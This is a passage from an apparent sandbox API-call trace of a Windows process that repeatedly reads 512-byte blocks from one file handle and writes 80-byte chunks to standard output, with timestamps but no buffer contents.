lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType 
(hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.706] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.706] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] GetFileType (hFile=0x4c) returned 0x1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, 
lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.707] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.707] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] GetFileType (hFile=0x4c) returned 0x1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.708] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.708] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.708] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] GetFileType (hFile=0x4c) returned 0x1 [0235.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=4) returned 0x54 
[0235.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.710] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, 
lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.710] GetFileType (hFile=0x4c) returned 0x1 [0235.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.711] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.711] GetFileType (hFile=0x4c) returned 0x1 [0235.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 
0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.712] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] GetFileType (hFile=0x4c) returned 0x1 [0235.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) 
returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0235.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.713] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] GetFileType (hFile=0x4c) returned 0x1 [0235.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] GetFileType (hFile=0x4c) returned 0x1 [0235.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.714] 